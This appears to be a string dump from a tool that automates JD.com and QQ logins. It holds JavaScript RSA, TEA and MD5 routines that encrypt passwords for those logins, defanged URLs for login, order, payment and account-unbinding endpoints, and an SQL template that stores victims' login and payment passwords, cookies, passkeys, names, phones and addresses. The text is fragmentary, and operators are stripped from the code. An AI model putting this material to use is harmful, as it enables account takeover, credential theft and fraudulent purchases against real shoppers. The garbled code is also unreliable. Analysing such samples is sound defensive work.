var aC = this.doPublic(t);
var z = aC.toString(16);
if ((z.length & 1) == 0) {
M.prototype.doPublic = X;
M.prototype.setPublic = p;
M.prototype.encrypt = q;
this.fromNumber(z, t, aB)
this.fromString(z, 256)
this.fromString(z, t)
aF = Math.floor(aB / 67108864);
if (aa && (navigator.appName == "Microsoft Internet Explorer")) {
at.prototype.am = az;
if (aa && (navigator.appName != "Netscape")) {
at.prototype.am = b;
at.prototype.am = ay;
at.prototype.DB = ax;
at.prototype.DM = ((1 << ax) - 1);
at.prototype.DV = (1 << ax);
at.prototype.FV = Math.pow(2, ab);
at.prototype.F1 = ab - ax;
at.prototype.F2 = 2 * ax - ab;
aq = "0".charCodeAt(0);
aq = "a".charCodeAt(0);
aq = "A".charCodeAt(0);
return af.charAt(t)
var aB = ah[z.charCodeAt(t)];
z.fromInt(t);
this.fromRadix(aF, z);
var aE = aF.length,
if (aF.charAt(aE) == "-") {
if (aD   aC > this.DB) {
this[this.t - 1] |= (t & ((1 << (this.DB - aD)) - 1)) << aD;
this[this.t  ] = (t >> (this.DB - aD))
if (aD >= this.DB) {
aD -= this.DB
this[this.t - 1] |= ((1 << (this.DB - aD)) - 1) << aD
this.clamp();
at.ZERO.subTo(this, this)
var t = this.s & this.DM;
return "-"   this.negate().toString(z)
return this.toRadix(z)
var aF = this.DB - (aC * this.DB) % aB;
if (aF < this.DB && (aG = this[aC] >> aF) > 0) {
aG |= this[--aC] >> (aF  = this.DB - aB)
aF  = this.DB; --aC
at.ZERO.subTo(this, t);
return (this.s < 0) ? this.negate() : this
return this.DB * (this.t - 1)   k(this[this.t - 1] ^ (this.s & this.DM))
z.t = Math.max(this.t - aB, 0);
var z = aG % this.DB;
var t = this.DB - z;
var aD = Math.floor(aG / this.DB),
aF = (this.s << z) & this.DM,
aC.clamp()
var aD = Math.floor(aF / this.DB);
var z = aF % this.DB;
t = Math.min(z.t, this.t);
aC[aB  ] = aD & this.DM;
aD >>= this.DB
aC[aB  ] = aD & this.DM;
aD >>= this.DB
aC[aB  ] = this.DV   aD
var t = this.abs(),
aD = z.abs();
aC[aB   t.t] = t.am(0, aD[aB], aC, aB, 0, t.t)
aC.clamp();
at.ZERO.subTo(aC, aC)
var t = this.abs();
var aC = t.am(z, t[z], aB, 2 * z, 0, 1);
if ((aB[z   t.t]  = t.am(z   1, 2 * t[z], aB, 2 * z   1, aC, t.t - z - 1)) >= t.DV) {
aB[z   t.t] -= t.DV;
aB[aB.t - 1]  = t.am(z, t[z], aB, 2 * z, 0, 1)
aB.clamp()
var aP = aJ.abs();
var aH = this.abs();
aG.fromInt(0)
this.copyTo(aF)
var aO = this.DB - k(aP[aP.t - 1]);
aP.lShiftTo(aO, aD);
aH.lShiftTo(aO, aF)
aP.copyTo(aD);
aH.copyTo(aF)
var aS = this.FV / aK,
aD.dlShiftTo(aM, aE);
if (aF.compareTo(aE) >= 0) {
aF.subTo(aE, aF)
at.ONE.dlShiftTo(aL, aE);
aE.subTo(aD, aD);
var aC = (aF[--aN] == aB) ? this.DM: Math.floor(aF[aN] * aS   (aF[aN - 1]   aQ) * aR);
if ((aF[aN]  = aD.am(0, aC, aF, aM, 0, aL)) < aC) {
aD.dlShiftTo(aM, aE);
aF.subTo(aE, aF);
aF.subTo(aE, aF)
aF.drShiftTo(aL, aG);
at.ZERO.subTo(aG, aG)
aF.clamp();
aF.rShiftTo(aO, aF)
at.ZERO.subTo(aF, aF)
this.abs().divRemTo(t, null, z);
if (this.s < 0 && z.compareTo(at.ZERO) > 0) {
t.subTo(z, z)
if (t.s < 0 || t.compareTo(this.m) >= 0) {
return t.mod(this.m)
t.divRemTo(this.m, null, t)
t.multiplyTo(aB, z);
this.reduce(z)
t.squareTo(z);
L.prototype.convert = W;
L.prototype.revert = al;
L.prototype.reduce = K;
L.prototype.mulTo = I;
L.prototype.sqrTo = av;
z = (z * (2 - t * z % this.DV)) % this.DV;
return (z > 0) ? this.DV - z: -z
this.mp = t.invDigit();
this.mpl = this.mp & 32767;
this.mph = this.mp >> 15;
this.um = (1 << (t.DB - 15)) - 1;
this.mt2 = 2 * t.t
t.abs().dlShiftTo(this.m.t, z);
z.divRemTo(this.m, null, z);
if (t.s < 0 && z.compareTo(at.ZERO) > 0) {
this.m.subTo(z, z)
t.copyTo(z);
this.reduce(z);
while (t.t <= this.mt2) {
var aC = (z * this.mpl   (((z * this.mph   (t[aB] >> 15) * this.mpl) & this.um) << 15)) & t.DM;
t[z]  = this.m.am(0, aC, t, aB, 0, this.m.t);
while (t[z] >= t.DV) {
t[z] -= t.DV;
t.clamp();
t.drShiftTo(this.m.t, t);
if (t.compareTo(this.m) >= 0) {
t.subTo(this.m, t)
f.prototype.convert = ak;
f.prototype.revert = au;
f.prototype.reduce = Q;
f.prototype.mulTo = A;
f.prototype.sqrTo = an;
return at.ONE
aE = aH.convert(this),
aE.copyTo(aF);
aH.sqrTo(aF, aB);
aH.mulTo(aB, aE, aF)
return aH.revert(aF)
if (aB < 256 || t.isEven()) {
return this.exp(aB, aC)
at.prototype.copyTo = Z;
at.prototype.fromInt = o;
at.prototype.fromString = x;
at.prototype.clamp = P;
at.prototype.dlShiftTo = ar;
at.prototype.drShiftTo = Y;
at.prototype.lShiftTo = u;
at.prototype.rShiftTo = m;
at.prototype.subTo = ac;
at.prototype.multiplyTo = E;
at.prototype.squareTo = R;
at.prototype.divRemTo = F;
at.prototype.invDigit = C;
at.prototype.isEven = j;
at.prototype.exp = y;
at.prototype.toString = r;
at.prototype.negate = S;
at.prototype.abs = am;
at.prototype.compareTo = H;
at.prototype.bitLength = v;
at.prototype.mod = O;
at.prototype.modPowInt = ao;
at.ZERO = c(0);
at.ONE = c(1);
d(new Date().getTime())
if (navigator.appName == "Netscape" && navigator.appVersion < "5" && window.crypto && window.crypto.random) {
var G = window.crypto.random(32);
for (J = 0; J < G.length;   J) {
V[ad  ] = G.charCodeAt(J) & 255
J = Math.floor(65536 * Math.random());
n.init(V);
for (ad = 0; ad < V.length;   ad) {
return n.next()
for (t = 0; t < z.length;   t) {
ae.prototype.nextBytes = aw;
z = (z   this.S[aC]   aD[aC % aD.length]) & 255;
l.prototype.init = e;
l.prototype.next = a;
t.setPublic(aB, z);
return t.encrypt(aC)
return Math.round(Math.random() * 4294967295)
for (var A = 0; A < C.length; A  ) {
var B = Number(C[A]).toString(16);
if (B.length == 1) {
for (var z = 0; z < A.length; z  = 2) {
B  = String.fromCharCode(parseInt(A.substr(z, 2), 16))
for (var z = 0; z < B.length; z  ) {
A[z] = B.charCodeAt(z)
var z = B.length;
var z = D.length;
for (var B = 0; B < A.length; B  ) {
var z = t.length;
for (var A = 0; A < D.length; A  ) {
B[A] = D.charCodeAt(A) & 255
for (var A = 0; A < D.length; A  = 2) {
B[z  ] = parseInt(D.substr(A, 2), 16)
for (var A = 0; A < B.length; A  ) {
z  = String.fromCharCode(B[A])
return d.encode(z)
initkey: function(z, A) {
d.PADCHAR = "=";
d.ALPHA = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /";
d.getbyte = function(B, A) {
var z = B.charCodeAt(A);
d.encode = function(D) {
if (arguments.length != 1) {
var A = d.PADCHAR;
var F = d.ALPHA;
var E = d.getbyte;
var B = D.length - D.length % 3;
if (D.length == 0) {
z.push(F.charAt(G >> 18));
z.push(F.charAt((G >> 12) & 63));
z.push(F.charAt((G >> 6) & 63));
z.push(F.charAt(G & 63))
switch (D.length - B) {
z.push(F.charAt(G >> 18)   F.charAt((G >> 12) & 63)   A   A);
z.push(F.charAt(G >> 18)   F.charAt((G >> 12) & 63)   F.charAt((G >> 6) & 63)   A);
return z.join("")
encrypt.Encryption = function() {
return binl2hex(core_md5(str2binl(s), s.length * chrsz))
return binl2str(core_md5(str2binl(s), s.length * chrsz))
function hex_hmac_md5(key, data) {
return binl2hex(core_hmac_md5(key, data))
function b64_hmac_md5(key, data) {
return binl2b64(core_hmac_md5(key, data))
function str_hmac_md5(key, data) {
return binl2str(core_hmac_md5(key, data))
for (var i = 0; i < x.length; i  = 16) {
function core_hmac_md5(key, data) {
var bkey = str2binl(key);
if (bkey.length > 16) {
bkey = core_md5(bkey, key.length * chrsz)
ipad[i] = bkey[i] ^ 909522486;
opad[i] = bkey[i] ^ 1549556828
var hash = core_md5(ipad.concat(str2binl(data)), 512   data.length * chrsz);
return core_md5(opad.concat(hash), 512   128)
for (var i = 0; i < str.length * chrsz; i  = chrsz) {
bin[i >> 5] |= (str.charCodeAt(i / chrsz) & mask) << (i % 32)
for (var i = 0; i < bin.length * 32; i  = chrsz) {
str  = String.fromCharCode((bin[i >> 5] >>> (i % 32)) & mask)
for (var i = 0; i < binarray.length * 4; i  ) {
str  = hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8   4)) & 15)   hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8)) & 15)
for (var i = 0; i < binarray.length * 4; i  = 3) {
if (i * 8   j * 6 > binarray.length * 32) {
str  = tab.charAt((triplet >> 6 * (3 - j)) & 63)
for (var i = 0; i < str.length; i = i   2) {
arr.push("\\x"   str.substr(i, 2))
arr = arr.join("");
var hex = str.toString(16);
var len = hex.length;
arr.push("\\x"   hex.substr(j, 2))
var result = arr.join("");
function getEncryption(password, user, vcode) {
password = password || "";
var md5Pwd = md5(password),
rsaH1 = encrypt.RSA.rsa_encrypt(h1),
rsaH1Len = (rsaH1.length / 2).toString(16),
hexVcode = TEA.strToBytes(vcode.toUpperCase()),
vcodeLen = "000"   vcode.length.toString(16);
while (rsaH1Len.length < 4) {
TEA.initkey(s2);
var saltPwd = TEA.enAsBase64(rsaH1Len   rsaH1   TEA.strToBytes(salt)   vcodeLen   hexVcode);
TEA.initkey("");
return saltPwd.replace(/[\/\ =]/g,
"/": "-",
" ": "*",
"=": "_"
function getRSAEncryption(password, vcode) {
var str1 = md5(password);
var str2 = str1   vcode.toUpperCase();
var str3 = encrypt.RSA.rsa_encrypt(str2);
&pt_randsalt=0&ptlang=2052&low_login_enable=0&u1=http://connect.qq.com&from_ui=1&fp=loginerroralert&device=2&aid=716027609&pt_3rd_aid=100273020&ptredirect=1&h=1&g=1&pt_uistyle=35&pt_vcode_v1=
hXXp://ptlogin2.qq.com/pt_open_login?openlogin_data=which=&refer_cgi=authorize&response_type=code&client_id=100273020&state=&display=&openapi=1010_1011&switch=0&src=1&sdkv=&sdkp=a&tid=1425887074&pf=&need_pay=0&browser=0&browser_error=&serial=&token_key=&redirect_uri=http%3A%2F%2Fwei.jd.com%2Fparty%2Ftws64%2Fm%2Fh5v1%2FGetCode_login%3Frurl%3DaHR0cDovL3dxcy5qZC5jb20vbXkvbXlfYWRkcmVzcy5zaHRtbA%3D%3D%26check%3Dcb39618c8374cb92014bc14a8b5cc7c3%26state%3D00-1425886621-14756-495&sign=&time=&status_version=&status_os=&status_machine=&page_type=1&has_auth=1&update_auth=1&auth_time=1425887509548&verifycode=
hXXp://wq.jd.com/mcoss/wxmall/home?ptype=2&sid=&_wv=1&vaswebreport=1
37128.9.4
&shownav=1
hXXp://wq.jd.com/mlogin/h5v1/cpLogin_BJ?rurl=http://wqs.jd.com/my/index.shtml?PTAG=
image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
4.0.0
1.1.0
http://h5.m.jd.com/active/member/html/index.html
&clientVersion=5.1.0&build=31030&client=android&d_brand=ONEPLUS&d_model=A0001&osVersion=4.3&screen=1920*1080&partner=baidu&area=
hXXp://api.m.jd.com/client.action?functionId=genToken&uuid=
application/x-www-form-urlencoded; charset=UTF-8
error_msg
tokenKey
hXXp://un.m.jd.com/cgi-bin/app/appjmp?tokenKey=
hXXp://218.249.47.94/Xianghe/MTK_Phone_KK_UAprofile.xml
;Mozilla/5.0 (Linux; U; Android 4.3; zh-cn; A0001 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
jdapp;android;4.1.0;4.3;
skuId=
hXXp://trade.jd.com/shopping/dynamic/consignee/getCitys.action
consigneeParam.provinceId=
hXXp://trade.jd.com/shopping/dynamic/consignee/getCountys.action
consigneeParam.cityId=
hXXp://trade.jd.com/shopping/dynamic/consignee/getTowns.action
consigneeParam.countyId=
function time(){return Math.random()}
hXXp://zt.m.jd.com/funding/m_load_address.action?Id=
hXXp://zt.m.jd.com/funding/m_save_address.action
;network/wifi;Mozilla/5.0 (Linux; U; Android 4.3; zh-cn; A0001 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
hXXp://mt.z.jd.com/funding/m_load_address.action?redoundId=
INSERT INTO JDorder (username,loginpwd,paypwd,cookie,status,orderId,totalprice,orderTime,name,phone,area,addr,productId_num,payDetail,Ecard,PASSKEY) VALUES ('{username}','{loginpwd}','{paypwd}','{cookie}','{status}','{orderId}',{totalprice},'{orderTime}','{name}','{phone}','{area}','{addr}','{productId_num}','{payDetail}','{Ecard}','{PASSKEY}')
{loginpwd}
{PASSKEY}
hXXp://zcashier.jd.com/funding/p/toCashier.action?orderId=
hXXp://trade.jr.jd.com/trade/tradebuy.action
hXXps://passport.jd.com/new/login.aspx
formlogin" method="post
hXXps://passport.jd.com/uc/rememberMeCheck?r=
application/x-www-form-urlencoded; charset=utf-8
loginName=
hXXps://passport.jd.com/uc/showAuthCode?r=
hXXps://authcode.jd.com/verify/image?a=1&acid=
hXXps://passport.jd.com/uc/showAuthCode?r=0.85103915524766
&loginpwd=
&nloginpwd=
loginname=
hXXps://passport.jd.com/uc/loginService?uuid=
&pt_randsalt=0&u1=https://graph.qq.com/oauth/login_jump&ptredirect=0&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=5-4-1452071901867&js_ver=10145&js_type=1&login_sig=zFfNcYVY2N-CQQBU4QFtSvxRvWU6SgSStk1YdiRrh*cnIIoE8qrNkd4SGmMVnL4H&pt_uistyle=33&aid=716027609&daid=383&pt_3rd_aid=100273020&
hXXps://ssl.ptlogin2.qq.com/login?u=
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
skey
hXXps://graph.qq.com/oauth2.0/authorize
hXXps://graph.qq.com/oauth/show?which=Login&display=pc&response_type=code&client_id=100273020&redirect_uri=hXXp://qq.jd.com/new/qq/callback.action
response_type=code&client_id=100273020&redirect_uri=http://qq.jd.com/new/qq/callback.action&scope=&state=&src=1&update_auth=1&openapi=80901010&g_tk=
{557CF400-1A04-11D3-9A73-0000F81EF32E}
{557CF401-1A04-11D3-9A73-0000F81EF32E}
{557CF402-1A04-11D3-9A73-0000F81EF32E}
{557CF405-1A04-11D3-9A73-0000F81EF32E}
{557CF406-1A04-11D3-9A73-0000F81EF32E}
loginsubmit
hXXp://authcode.jd.com/verify/image?a=1&acid=
hXXp://qq.jd.com/new/bindExistAccount.action?uuid=
&loginname=
hXXp://safe.jd.com/union/index.action
hXXp://safe.jd.com/user/paymentpassword/safetyCenter.action
hXXp://safe.jd.com/union/doUnBind?t=
hXXp://safe.jd.com/union/index.action?t=
wq_skey
wq_skey=
hXXp://wq.jd.com/bases/myindex/getindvdata?callback=myData&t=
Mozilla/5.0 (Linux; U; Android 4.2.2; zh-cn; InFocus M310 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 V1_AND_SQ_5.4.0_218_YYB_D QQ/5.4.1.2395 NetType/WIFI
login error
hXXp://wq.jd.com/user/info/QueryJDUserInfo?sceneid=
hXXp://wqs.jd.com/my/indexv2.shtml?PTAG=37128.9.4&shownav=1
no login
base.TipUrl
hXXp://wq.jd.com/pinbind/accountInfo?sceneid=
currPinInfo.pinType
currPinInfo.pin
].pinType
].pin
wqs.jd.com/my/accountv2.shtml?sceneid=11110&state=1&rurl=
wqs.jd.com/my/accountv2.shtml
hXXp://wq.jd.com/pinbind/unbind?sceneid=11110&fromtype=
com.tencent.mobileqq
hXXp://sq.jr.jd.com/cm_focus/focus?key=1000&systemId=
hXXp://z.jd.com/project/details/
hXXp://sq.jr.jd.com/cm/praise?key=1000&systemId=
hXXp://trade-z.jd.com/funding/support_project.action?projectId=
&o=trade-z.jd.com/funding/support_project.action
hXXp://payrisk.jd.com/y.html?v=
hXXp://trade-z.jd.com/funding/project_subscribe.action
hXXp://trade-z.jd.com/funding/save_address.action
hXXp://trade-z.jd.com/funding/update_address.action
address.id
ip.txt
hXXp://VVV.net.cn/static/customercare/yourip.asp
LoginURL
hXXp://
LoginPOST
LoginRefer
{"method":"do","login":{"password":"
{password}
DisconnURL
ConnURL
network.wan_status.ipaddr
0.0.0.0
"0.0.0.0"
len1 = input1.length;
len2 = input2.length;
lenDict = dictionary.length;
cr = input2.charCodeAt(index);
cl = input1.charCodeAt(index);
output  = dictionary.charAt((cl ^ cr)%lenDict);
*.txt
hXXp://VVV.178hui.com/index.php?rec=20686
hXXp://VVV.51bi.com/siteAward/i_32035343/?key=62-b7fb-4a41-bb8
hXXps://media.jd.com/
hXXp://click2.yaoqing.com/ckvzjf
hXXp://api.m.jd.com/client.action?functionId=wait4Payment&uuid=
].orderId
].price
].orderType
&clientVersion=5.1.0&build=31030&client=android&d_brand=ONEPLUS&d_model=A0001&osVersion=4.3&screen=1920*1080&partner=jingdong&area=&networkType=wifi&sign=
hXXp://pay.m.jd.com/index.action?functionId=genAppPayId&uuid=
hXXps://pay.m.jd.com/pay/index.html?payId=
hXXp://qr.topscan.com/api.php?text=
].jpg
1752036:
&clientVersion=5.1.0&build=31030&client=android&d_brand=ONEPLUS&d_model=A0001&osVersion=4.3&screen=1920*1080&partner=jd-m&area=&networkType=wifi&st=
hXXp://api.m.jd.com/client.action?functionId=newOrderMessage&uuid=
].crateTime
].message
&clientVersion=5.1.0&build=31030&client=android&d_brand=ONEPLUS&d_model=A0001&osVersion=4.3&screen=1920*1080&partner=jd-m&area=&networkType=wifi&sign=
hXXp://api.m.jd.com/client.action?functionId=newOrderInfo&uuid=
orderInfo.checkCode
orderInfo.carrier
hXXp://order.jd.com/lazy/getOrderShowJson.action
error":"NotLogin
function timea(){var d,s;d=new Date();d.setTime('
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.82 Safari/537.36
https:
hXXps://cashier.jd.com/
hXXp://order.jd.com/center/search.action?keyword=
hXXp://order.jd.com/center/list.action?s=1
&PassKey=.*?)"[\s\S]*?payment.pay.(action.id=
normal.item.action.(orderid=
&PassKey=.*?)"[\s\S]*?(cashier.jd.hk/payment\?PReq=.*?)"
hXXp://order.jd.com/lazy/getPopOrderInfo.action?callback=jsonp
(bankChoose_Common.action\?id=
(card.jd.com.{1,20}order_pay.action\?orderId=
(http.{0,1}:[^"]*?pay.*?)"
hXXp://pay.jd.com/payment/
hXXp://yuding.jd.com/ordersoa/presale/ordersbatch?jsonstr=
].orderid
].data.row1.d
].data.row1.operate
].data.row2.d
].data.row2.operate
hXXps://
hXXp://order.jd360.hk/normal/item.action?
hXXps://cashier.jd.com/payment/pay.
hXXp://order.jd.com/normal/item.action?
PASSKEY
applogin
wskey
hXXp://m.jd.com/
<img src="/ja.jsp
hXXp://m.jd.com/ja.jsp
hXXps://passport.m.jd.com/user/login.action?returnurl=hXXp://m.jd.com?indexloc=1
this.modulus = biCopy(a),
this.k = biHighIndex(this.modulus)   1;
b.digits[2 * this.k] = 1,
this.mu = biDivide(b, this.modulus),
this.bkplus1 = new BigInt,
this.bkplus1.digits[this.k   1] = 1,
this.modulo = BarrettMu_modulo,
this.multiplyMod = BarrettMu_multiplyMod,
this.powMod = BarrettMu_powMod
c = biMultiply(b, this.mu),
f = biMultiply(d, this.modulus),
h.isNeg && (h = biAdd(h, this.bkplus1));
for (var i = biCompare(h, this.modulus) >= 0; i;) h = biSubtract(h, this.modulus),
i = biCompare(h, this.modulus) >= 0;
return this.modulo(c)
c.digits[0] = 1;
if (0 != (1 & e.digits[0]) && (c = this.multiplyMod(c, d)), e = biShiftRight(e, 1), 0 == e.digits[0] && 0 == biHighIndex(e)) break;
d = this.multiplyMod(d, d)
for (var b = 0; b < ZERO_ARRAY.length; b  ) ZERO_ARRAY[b] = 0;
bigOne.digits[0] = 1
this.digits = "boolean" == typeof a && 1 == a ? null: ZERO_ARRAY.slice(0),
this.isNeg = !1
for (var b, c = "-" == a.charAt(0), d = c ? 1 : 0; d < a.length && "0" == a.charAt(d);)  d;
if (d == a.length) b = new BigInt;
var e = a.length - d,
for (0 == f && (f = dpl10), b = biFromNumber(Number(a.substr(d, f))), d  = f; d < a.length;) b = biAdd(biMultiply(b, lr10), biFromNumber(Number(a.substr(d, dpl10)))),
b.isNeg = c
return b.digits = a.digits.slice(0),
b.isNeg = a.isNeg,
b.isNeg = 0 > a,
a = Math.abs(a);
for (var c = 0; a > 0;) b.digits[c  ] = a & maxDigitVal,
c = a.length - 1; c > -1; --c) b  = a.charAt(c);
c.digits[0] = b;
for (var d = biDivideModulo(a, c), e = hexatrigesimalToChar[d[1].digits[0]]; 1 == biCompare(d[0], bigZero);) d = biDivideModulo(d[0], c),
digit = d[1].digits[0],
e  = hexatrigesimalToChar[d[1].digits[0]];
return (a.isNeg ? "-": "")   reverseStr(e)
b.digits[0] = 10;
for (var c = biDivideModulo(a, b), d = String(c[1].digits[0]); 1 == biCompare(c[0], bigZero);) c = biDivideModulo(c[0], b),
d  = String(c[1].digits[0]);
return (a.isNeg ? "-": "")   reverseStr(d)
c = (biHighIndex(a), biHighIndex(a)); c > -1; --c) b  = digitToHex(a.digits[c]);
c = Math.min(a.length, 4), d = 0; c > d;   d) b <<= 4,
b |= charToHex(a.charCodeAt(d));
c = a.length,
e = 0; d > 0; d -= 4,   e) b.digits[e] = hexToDigit(a.substr(Math.max(d - 4, 0), Math.min(d, 4)));
var c = "-" == a.charAt(0),
f.digits[0] = 1;
for (var g = a.length - 1; g >= d; g--) {
var h = a.charCodeAt(g),
return e.isNeg = c,
c = biHighIndex(a); c > -1; --c) b  = digitToBytes(a.digits[c]);
var b = String.fromCharCode(255 & a);
var c = String.fromCharCode(255 & a);
return (a.isNeg ? "-": "")   a.digits.join(" ")
if (a.isNeg != b.isNeg) b.isNeg = !b.isNeg,
b.isNeg = !b.isNeg;
f = 0; f < a.digits.length;   f) d = a.digits[f]   b.digits[f]   e,
c.digits[f] = 65535 & d,
c.isNeg = a.isNeg
for (var f = 0; f < a.digits.length;   f) d = a.digits[f] - b.digits[f]   e,
c.digits[f] < 0 && (c.digits[f]  = biRadix),
for (var f = 0; f < a.digits.length;   f) d = 0 - c.digits[f]   e,
c.digits[f] = 65535 & d,
c.digits[f] < 0 && (c.digits[f]  = biRadix),
c.isNeg = !a.isNeg
} else c.isNeg = a.isNeg
for (var b = a.digits.length - 1; b > 0 && 0 == a.digits[b];)--b;
d = a.digits[c],
for (c = 0, e = i, j = 0; j <= g;   j,   e) d = f.digits[e]   a.digits[j] * b.digits[i]   c,
f.digits[e] = d & maxDigitVal,
f.digits[i   g   1] = c
return f.isNeg = a.isNeg != b.isNeg,
for (var f = 0; c >= f;   f) e = result.digits[f]   a.digits[f] * b   d,
result.digits[f] = e & maxDigitVal,
return result.digits[1   c] = d,
for (var f = Math.min(b   e, a.length), g = b, h = d; f > g;   g,   h) c[h] = a[g]
var c = Math.floor(b / bitsPerDigit),
arrayCopy(a.digits, 0, d.digits, c, d.digits.length - c);
g = d.digits.length - 1,
h = g - 1; g > 0; --g, --h) d.digits[g] = d.digits[g] << e & maxDigitVal | (d.digits[h] & highBitMasks[e]) >>> f;
return d.digits[0] = d.digits[g] << e & maxDigitVal,
d.isNeg = a.isNeg,
arrayCopy(a.digits, c, d.digits, 0, a.digits.length - c);
h = g   1; g < d.digits.length - 1;   g,   h) d.digits[g] = d.digits[g] >>> e | (d.digits[h] & lowBitMasks[e]) << f;
return d.digits[d.digits.length - 1] >>>= e,
return arrayCopy(a.digits, 0, c.digits, b, c.digits.length - b),
return arrayCopy(a.digits, b, c.digits, 0, c.digits.length - b),
return arrayCopy(a.digits, 0, c.digits, 0, b),
if (a.isNeg != b.isNeg) return 1 - 2 * Number(a.isNeg);
for (var c = a.digits.length - 1; c >= 0; --c) if (a.digits[c] != b.digits[c]) return a.isNeg ? 1 - 2 * Number(a.digits[c] > b.digits[c]) : 1 - 2 * Number(a.digits[c] < b.digits[c]);
g = b.isNeg;
if (f > e) return a.isNeg ? (c = biCopy(bigOne), c.isNeg = !b.isNeg, a.isNeg = !1, b.isNeg = !1, d = biSubtract(b, a), a.isNeg = !0, b.isNeg = g) : (c = new BigInt, d = biCopy(a)),
for (var h = Math.ceil(f / bitsPerDigit) - 1, i = 0; b.digits[h] < biHalfRadix;) b = biShiftLeft(b, 1),
h = Math.ceil(f / bitsPerDigit) - 1;
for (var j = Math.ceil(e / bitsPerDigit) - 1, k = biMultiplyByRadixPower(b, j - h); - 1 != biCompare(d, k);)  c.digits[j - h],
var m = l >= d.digits.length ? 0 : d.digits[l],
n = l - 1 >= d.digits.length ? 0 : d.digits[l - 1],
o = l - 2 >= d.digits.length ? 0 : d.digits[l - 2],
p = h >= b.digits.length ? 0 : b.digits[h],
q = h - 1 >= b.digits.length ? 0 : b.digits[h - 1];
c.digits[l - h - 1] = m == p ? maxDigitVal: Math.floor((m * biRadix   n) / p);
for (var r = c.digits[l - h - 1] * (p * biRadix   q), s = m * biRadixSquared   (n * biRadix   o); r > s;)--c.digits[l - h - 1],
r = c.digits[l - h - 1] * (p * biRadix | q),
d = biSubtract(d, biMultiplyDigit(k, c.digits[l - h - 1])),
d.isNeg && (d = biAdd(d, k), --c.digits[l - h - 1])
c.isNeg = a.isNeg != g,
a.isNeg && (c = g ? biAdd(c, bigOne) : biSubtract(c, bigOne), b = biShiftRight(b, i), d = biSubtract(b, d)),
0 == d.digits[0] && 0 == biHighIndex(d) && (d.isNeg = !1),
if (0 != (1 & f.digits[0]) && (d = biMultiplyMod(d, e, c)), f = biShiftRight(f, 1), 0 == f.digits[0] && 0 == biHighIndex(f)) break;
function RSAKeyPair(a, b, c, d) {
this.chunkSize = "number" != typeof d ? 2 * biHighIndex(this.m) : d / 8,
this.radix = 16,
this.barrett = new BarrettMu(this.m)
p = b.length,
for (h = "string" == typeof c ? c == RSAAPP.NoPadding ? 1 : c == RSAAPP.PKCS1Padding ? 2 : 0 : 0, i = "string" == typeof d && d == RSAAPP.RawEncoding ? 1 : 0, 1 == h ? p > a.chunkSize && (p = a.chunkSize) : 2 == h && p > a.chunkSize - 11 && (p = a.chunkSize - 11), e = 0, f = 2 == h ? p - 1 : a.chunkSize - 1; p > e;) h ? o[f] = b.charCodeAt(e) : o[e] = b.charCodeAt(e),
for (1 == h && (e = 0), f = a.chunkSize - p % a.chunkSize; f > 0;) {
for (j = Math.floor(256 * Math.random()); ! j;) j = Math.floor(256 * Math.random());
for (2 == h && (o[p] = 0, o[a.chunkSize - 2] = 2, o[a.chunkSize - 1] = 0), k = o.length, e = 0; k > e; e  = a.chunkSize) {
for (l = new BigInt, f = 0, g = e; g < e   a.chunkSize;   f) l.digits[f] = o[g  ],
l.digits[f]  = o[g  ] << 8;
m = a.barrett.powMod(l, a.e),
n = 1 == i ? biToBytes(m) : 16 == a.radix ? biToHex(m) : biToString(m, a.radix),
var c, d, e, f, g = b.split(" "),
for (d = 0; d < g.length;   d) for (f = 16 == a.radix ? biFromHex(g[d]) : biFromString(g[d], a.radix), c = a.barrett.powMod(f, a.d), e = 0; e <= biHighIndex(c);   e) h  = String.fromCharCode(255 & c.digits[e], c.digits[e] >> 8);
return 0 == h.charCodeAt(h.length - 1) && (h = h.substring(0, h.length - 1)),
RSAAPP.NoPadding = "NoPadding",
RSAAPP.PKCS1Padding = "PKCS1Padding",
RSAAPP.RawEncoding = "RawEncoding",
RSAAPP.NumericEncoding = "NumericEncoding",
c = "hXXp://wlmonitor.m.jd.com/web_login_report?"   c.substring(1),
b.src = c
if ("object" == typeof c && null != c) for (var d in c)"object" == typeof c[d] ? (a[d] = c[d].length ? [] : {},
for (var b = location.search.substring(1), c = b.split("&"), d = {},
e = 0; e < c.length; e  ) {
var f = c[e].split("=");
var b = document.cookie.match(new RegExp("(^| )"   a   "=([^;]*)($|;)"));
loginName: "",
appVersion: "1.3.0",
//window.pl_report = e
function getPass(pass,pubkey){
var key = new RSAKeyPair("3", "10001", pubkey, 1024);
var c = Base64.btoa(encryptedString(key, pass, RSAAPP.PKCS1Padding, RSAAPP.RawEncoding));
if (/([^\u0000-\u00ff])/.test(s)) {
while (i < s.length) {
ascii = s.charCodeAt(i);
result.push(base64hash.charAt(ascii >> 2));
result.push(base64hash.charAt((prev & 3) << 4 | (ascii >> 4)));
result.push(base64hash.charAt((prev & 0x0f) << 2 | (ascii >> 6)));
result.push(base64hash.charAt(ascii & 0x3f));
result.push(base64hash.charAt((prev & 3) << 4));
result.push('==');
result.push(base64hash.charAt((prev & 0x0f) << 2));
result.push('=');
return result.join('');
s = s.replace(/\s|=/g, '');
cur = base64hash.indexOf(s.charAt(i));
result.push(String.fromCharCode(prev << 2 | cur >> 4));
result.push(String.fromCharCode((prev & 0x0f) << 4 | cur >> 2));
result.push(String.fromCharCode((prev & 3) << 6 | cur));
getPass
hXXps://plogin.m.jd.com/cgi-bin/m/authcode?mod=login
hXXps://plogin.m.jd.com/cgi-bin/m/domlogin
application/x-www-form-urlencoded; Charset=UTF-8
_bak.txt
hXXp://p.3.cn/prices/get?skuid=J_
Mozilla/4.0
hXXp://1111.ip138.com/ic.asp
hXXp://ip.proxyfire.net/ip.php
tcashier.jdpay.com
